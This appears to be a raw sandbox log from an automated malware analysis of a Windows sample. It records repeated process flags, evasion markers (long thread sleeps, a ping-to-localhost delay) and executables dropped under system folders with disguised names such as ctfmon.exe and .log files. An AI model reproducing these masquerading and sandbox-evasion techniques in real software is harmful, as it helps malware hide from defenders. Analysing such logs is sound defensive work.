                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Memory allocated: 12E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Memory allocated: 1AF50000 memory reserve | memory write watch
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Memory allocated: 17F0000 memory reserve | memory write watch
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Memory allocated: 1B310000 memory reserve | memory write watch
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Memory allocated: 16D0000 memory reserve | memory write watch
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Memory allocated: 1B1F0000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe | Memory allocated: DD0000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe | Memory allocated: 1A7C0000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe | Memory allocated: 17F0000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe | Memory allocated: 1B100000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Memory allocated: 10C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Memory allocated: 1AEB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Memory allocated: C40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Memory allocated: 1A620000 memory reserve | memory write watch
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | Memory allocated: 990000 memory reserve | memory write watch
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | Memory allocated: 1A650000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe | Memory allocated: B20000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe | Memory allocated: 1A6F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599859
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599734
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599625
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599502
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599375
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599266
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599141
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 599031
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 598915
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 596734
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 596604
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 596499
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 596370
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 596203
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 596009
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 595828
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ctfmon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ctfmon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ctfmon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Window / User API: threadDelayed 5423
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3666
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3163
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\QMBYhgjh.log
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\rUslzROg.log
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\yRglcgIV.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\PYxQwTnj.log
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\KlfRTWYv.log
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\zxBbjKdN.log
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599859s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599734s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599625s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599502s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599375s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599266s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599141s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -599031s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -598915s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99891s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99781s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99672s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99563s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99438s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99175s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -99047s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98937s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98821s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98689s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98563s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98437s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98328s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98219s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -98110s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -97985s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -596604s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -596499s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -596370s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -596009s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540 | Thread sleep time: -595828s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 6488 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 4892 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe TID: 3768 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe TID: 776 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ctfmon.exe TID: 5776 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ctfmon.exe TID: 3816 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe TID: 3152 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe TID: 3700 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1224 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 6416 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460 | Thread sleep count: 3666 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 | Thread sleep count: 3610 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 | Thread sleep count: 2970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 | Thread sleep count: 3122 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780 | Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 | Thread sleep count: 3396 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 | Thread sleep count: 3163 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe TID: 7908 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe TID: 3908 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ctfmon.exe TID: 7660 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ctfmon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ctfmon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | File Volume queried: C:\ FullSizeInformation
